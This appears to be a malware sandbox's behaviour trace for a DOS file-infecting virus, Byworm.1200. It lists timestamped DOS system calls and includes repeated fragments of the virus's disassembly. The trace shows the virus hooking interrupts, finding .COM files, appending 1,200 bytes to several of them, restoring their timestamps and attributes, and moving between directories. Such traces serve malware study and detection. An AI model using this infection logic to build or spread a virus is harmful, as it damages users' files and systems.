Sample viewer

vx.netlux.org/Virus.DOS.Byworm.1200

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:23:36.96750846Z 53 PC: 12aaf | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:23:36.968887075Z 53 PC: 12abb | Get interrupt vector (Interrupt = '32' AKA 'Reserved')
2018-12-17T22:23:36.97004049Z 37 PC: 12ac4 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:23:36.971129327Z 26 PC: 12b05 | Set disk transfer address
2018-12-17T22:23:36.972252415Z 71 PC: 12b0f | Get current directory
2018-12-17T22:23:36.975100416Z 78 PC: 12cb6 | Find first file
2018-12-17T22:23:36.981330473Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:36.997966907Z 61 PC: 12cf7 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:23:37.004825701Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.011108966Z 44 PC: 12e33 | Get time 0x12e33: mov word ptr [bp + 0x5ac], dx
0x12e37: mov si, dx
0x12e39: mov ax, word ptr [si]
0x12e3b: mov word ptr [bp + 0x5ae], ax
0x12e3f: ret
0x12e40: xor cx, cx
0x12e42: cdq
0x12e43: int 0x21
0x12e45: ret
0x12e46: mov cx, 0x4b0
0x12e49: lea si, word ptr [bp + 0x100]
0x12e4d: lea di, word ptr [bp + 0x63d]
0x12e51: cld
0x12e52: rep movsb byte ptr es:[di], byte ptr [si]
0x12e54: mov ax, word ptr [bp + 0x5ac]
0x12e58: mov cx, 0x215
0x12e5b: lea si, word ptr [bp + 0x182]
0x12e5f: add si, 0x53d
0x12e63: lea di, word ptr [bp + 0x156]
0x12e67: add ax, word ptr [di]
2018-12-17T22:23:37.01309541Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.01536899Z 64 PC: 12eb3 | Write file or device (Write 1200 bytes on handle 5)
2018-12-17T22:23:37.021249637Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.023276343Z 64 PC: 12da6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:37.030447117Z 87 PC: 12ec7 | Get or set file date and time
2018-12-17T22:23:37.031811009Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.039328607Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.044463075Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.046961929Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.056417825Z 61 PC: 12cf7 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:23:37.063617894Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.070064173Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.071773831Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.081698831Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.089229806Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.098693918Z 61 PC: 12cf7 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:23:37.106032329Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.112358069Z 44 PC: 12e33 | Get time 0x12e33: mov word ptr [bp + 0x5ac], dx
0x12e37: mov si, dx
0x12e39: mov ax, word ptr [si]
0x12e3b: mov word ptr [bp + 0x5ae], ax
0x12e3f: ret
0x12e40: xor cx, cx
0x12e42: cdq
0x12e43: int 0x21
0x12e45: ret
0x12e46: mov cx, 0x4b0
0x12e49: lea si, word ptr [bp + 0x100]
0x12e4d: lea di, word ptr [bp + 0x63d]
0x12e51: cld
0x12e52: rep movsb byte ptr es:[di], byte ptr [si]
0x12e54: mov ax, word ptr [bp + 0x5ac]
0x12e58: mov cx, 0x215
0x12e5b: lea si, word ptr [bp + 0x182]
0x12e5f: add si, 0x53d
0x12e63: lea di, word ptr [bp + 0x156]
0x12e67: add ax, word ptr [di]
2018-12-17T22:23:37.11458518Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.116716592Z 64 PC: 12eb3 | Write file or device (Write 1200 bytes on handle 5)
2018-12-17T22:23:37.125600376Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.127027564Z 64 PC: 12da6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:37.134590777Z 87 PC: 12ec7 | Get or set file date and time
2018-12-17T22:23:37.136683914Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.144566933Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.147849788Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.150255753Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.160165483Z 61 PC: 12cf7 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:23:37.166492052Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.173310937Z 44 PC: 12e33 | Get time 0x12e33: mov word ptr [bp + 0x5ac], dx
0x12e37: mov si, dx
0x12e39: mov ax, word ptr [si]
0x12e3b: mov word ptr [bp + 0x5ae], ax
0x12e3f: ret
0x12e40: xor cx, cx
0x12e42: cdq
0x12e43: int 0x21
0x12e45: ret
0x12e46: mov cx, 0x4b0
0x12e49: lea si, word ptr [bp + 0x100]
0x12e4d: lea di, word ptr [bp + 0x63d]
0x12e51: cld
0x12e52: rep movsb byte ptr es:[di], byte ptr [si]
0x12e54: mov ax, word ptr [bp + 0x5ac]
0x12e58: mov cx, 0x215
0x12e5b: lea si, word ptr [bp + 0x182]
0x12e5f: add si, 0x53d
0x12e63: lea di, word ptr [bp + 0x156]
0x12e67: add ax, word ptr [di]
2018-12-17T22:23:37.175415294Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.177084592Z 64 PC: 12eb3 | Write file or device (Write 1200 bytes on handle 5)
2018-12-17T22:23:37.182924554Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.184022224Z 64 PC: 12da6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:37.188275028Z 87 PC: 12ec7 | Get or set file date and time
2018-12-17T22:23:37.19062681Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.196040446Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.20812725Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.211467823Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.221370235Z 61 PC: 12cf7 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:23:37.227723589Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.234505393Z 44 PC: 12e33 | Get time 0x12e33: mov word ptr [bp + 0x5ac], dx
0x12e37: mov si, dx
0x12e39: mov ax, word ptr [si]
0x12e3b: mov word ptr [bp + 0x5ae], ax
0x12e3f: ret
0x12e40: xor cx, cx
0x12e42: cdq
0x12e43: int 0x21
0x12e45: ret
0x12e46: mov cx, 0x4b0
0x12e49: lea si, word ptr [bp + 0x100]
0x12e4d: lea di, word ptr [bp + 0x63d]
0x12e51: cld
0x12e52: rep movsb byte ptr es:[di], byte ptr [si]
0x12e54: mov ax, word ptr [bp + 0x5ac]
0x12e58: mov cx, 0x215
0x12e5b: lea si, word ptr [bp + 0x182]
0x12e5f: add si, 0x53d
0x12e63: lea di, word ptr [bp + 0x156]
0x12e67: add ax, word ptr [di]
2018-12-17T22:23:37.236621668Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.238339441Z 64 PC: 12eb3 | Write file or device (Write 1200 bytes on handle 5)
2018-12-17T22:23:37.247272854Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.248616909Z 64 PC: 12da6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:37.254842214Z 87 PC: 12ec7 | Get or set file date and time
2018-12-17T22:23:37.257660425Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.265449163Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.269935571Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.273112861Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.28284355Z 61 PC: 12cf7 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:23:37.289176674Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.295752788Z 44 PC: 12e33 | Get time 0x12e33: mov word ptr [bp + 0x5ac], dx
0x12e37: mov si, dx
0x12e39: mov ax, word ptr [si]
0x12e3b: mov word ptr [bp + 0x5ae], ax
0x12e3f: ret
0x12e40: xor cx, cx
0x12e42: cdq
0x12e43: int 0x21
0x12e45: ret
0x12e46: mov cx, 0x4b0
0x12e49: lea si, word ptr [bp + 0x100]
0x12e4d: lea di, word ptr [bp + 0x63d]
0x12e51: cld
0x12e52: rep movsb byte ptr es:[di], byte ptr [si]
0x12e54: mov ax, word ptr [bp + 0x5ac]
0x12e58: mov cx, 0x215
0x12e5b: lea si, word ptr [bp + 0x182]
0x12e5f: add si, 0x53d
0x12e63: lea di, word ptr [bp + 0x156]
0x12e67: add ax, word ptr [di]
2018-12-17T22:23:37.29775886Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.299374373Z 64 PC: 12eb3 | Write file or device (Write 1200 bytes on handle 5)
2018-12-17T22:23:37.308620136Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.31002002Z 64 PC: 12da6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:37.316240581Z 87 PC: 12ec7 | Get or set file date and time
2018-12-17T22:23:37.318377252Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.326069004Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.330560914Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.333221229Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.343422547Z 61 PC: 12cf7 | Open file (Filename = 'PAH.COM')
2018-12-17T22:23:37.354756721Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.362038812Z 44 PC: 12e33 | Get time 0x12e33: mov word ptr [bp + 0x5ac], dx
0x12e37: mov si, dx
0x12e39: mov ax, word ptr [si]
0x12e3b: mov word ptr [bp + 0x5ae], ax
0x12e3f: ret
0x12e40: xor cx, cx
0x12e42: cdq
0x12e43: int 0x21
0x12e45: ret
0x12e46: mov cx, 0x4b0
0x12e49: lea si, word ptr [bp + 0x100]
0x12e4d: lea di, word ptr [bp + 0x63d]
0x12e51: cld
0x12e52: rep movsb byte ptr es:[di], byte ptr [si]
0x12e54: mov ax, word ptr [bp + 0x5ac]
0x12e58: mov cx, 0x215
0x12e5b: lea si, word ptr [bp + 0x182]
0x12e5f: add si, 0x53d
0x12e63: lea di, word ptr [bp + 0x156]
0x12e67: add ax, word ptr [di]
2018-12-17T22:23:37.36495911Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.366937832Z 64 PC: 12eb3 | Write file or device (Write 1200 bytes on handle 5)
2018-12-17T22:23:37.375059956Z 66 PC: 12e45 | Move file pointer
2018-12-17T22:23:37.377138178Z 64 PC: 12da6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:37.383412936Z 87 PC: 12ec7 | Get or set file date and time
2018-12-17T22:23:37.384762084Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.392143293Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.39668766Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.399746611Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.409674121Z 61 PC: 12cf7 | Open file (Filename = 'TEST.COM')
2018-12-17T22:23:37.416940896Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.423358171Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.426123592Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.430575817Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.433272497Z 78 PC: 12cb6 | Find first file
2018-12-17T22:23:37.439300708Z 59 PC: 12cae | Change current directory
2018-12-17T22:23:37.443449962Z 78 PC: 12cb6 | Find first file
2018-12-17T22:23:37.447312446Z 44 PC: 12b16 | Get time 0x12b16: push dx
0x12b17: xchg dl, al
0x12b19: add si, ax
0x12b1b: mov al, byte ptr [si]
0x12b1d: cmp al, 0x5a
0x12b1f: jbe 0x12b25
0x12b21: sub al, 0x20
0x12b23: jmp 0x12b1d
0x12b25: cmp al, 0x40
0x12b27: jg 0x12b2f
0x12b29: pop dx
0x12b2a: push dx
0x12b2b: add al, dh
0x12b2d: jmp 0x12b25
0x12b2f: mov byte ptr [bp + 0x590], al
0x12b33: cmp byte ptr [bp + 0x590], 0x5a
0x12b38: jg 0x12b77
0x12b3a: mov ah, 0x4e
0x12b3c: mov cx, 0x10
0x12b3f: lea dx, word ptr [bp + 0x590]
2018-12-17T22:23:37.449909606Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.460172005Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.47026487Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.481457939Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.487073324Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.492626691Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.498906297Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.504635509Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.514794288Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.522416729Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.532551259Z 78 PC: 12b45 | Find first file
2018-12-17T22:23:37.538750282Z 59 PC: 12bd9 | Change current directory
2018-12-17T22:23:37.544627422Z 78 PC: 12cb6 | Find first file
2018-12-17T22:23:37.550522966Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.559956683Z 61 PC: 12cf7 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:23:37.567308845Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.573459401Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.575020519Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.580653029Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.583209437Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.59267653Z 61 PC: 12cf7 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:23:37.600058457Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.606206076Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.607873472Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.613097493Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.615598336Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.625089061Z 61 PC: 12cf7 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:23:37.631978355Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.638166284Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.639778232Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.644801813Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.647431314Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.659722817Z 61 PC: 12cf7 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:23:37.666380436Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.672571376Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.674223149Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.679176595Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.681711998Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.692191053Z 61 PC: 12cf7 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:23:37.699176001Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.705362281Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.706944436Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.716370772Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.723115349Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.732462674Z 61 PC: 12cf7 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:23:37.739391965Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.745650838Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.747396913Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.752534694Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.755277759Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.765088835Z 61 PC: 12cf7 | Open file (Filename = 'PAH.COM')
2018-12-17T22:23:37.776878248Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.782756011Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.783984266Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.788971515Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.791498815Z 67 PC: 12cee | Get or set file attributes
2018-12-17T22:23:37.801186324Z 61 PC: 12cf7 | Open file (Filename = 'TEST.COM')
2018-12-17T22:23:37.808563661Z 63 PC: 12d05 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:23:37.814737968Z 62 PC: 12d60 | Close file
2018-12-17T22:23:37.816399715Z 67 PC: 12d6d | Get or set file attributes
2018-12-17T22:23:37.821968545Z 79 PC: 12cbf | Find next file
2018-12-17T22:23:37.824300454Z 78 PC: 12cb6 | Find first file
2018-12-17T22:23:37.82990522Z 59 PC: 12cae | Change current directory
2018-12-17T22:23:37.834831859Z 78 PC: 12cb6 | Find first file
2018-12-17T22:23:37.843524995Z 59 PC: 12bf8 | Change current directory
2018-12-17T22:23:37.852477069Z 26 PC: 12bff | Set disk transfer address
2018-12-17T22:23:37.854575413Z 44 PC: 12c03 | Get time 0x12c03: cmp dl, 5
0x12c06: jae 0x12c10
0x12c08: mov ah, 9
0x12c0a: lea dx, word ptr [bp + 0x331]
0x12c0e: int 0x21
0x12c10: push ds
0x12c11: mov ax, 0x2503
0x12c14: mov dx, word ptr [bp + 0x5b3]
0x12c18: mov ds, word ptr [bp + 0x5b1]
0x12c1c: int 0x21
0x12c1e: pop ds
0x12c1f: in al, 0x21
0x12c21: and al, 0xfd
0x12c23: out 0x21, al
0x12c25: mov al, byte ptr [bp + 0x5b0]
0x12c29: cmp al, 0
0x12c2b: jne 0x12c2e
0x12c2d: ret
0x12c2e: pop word ptr [bp + 0x5a9]
0x12c32: pop word ptr [bp + 0x5a7]
2018-12-17T22:23:37.857116842Z 37 PC: 12c1e | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')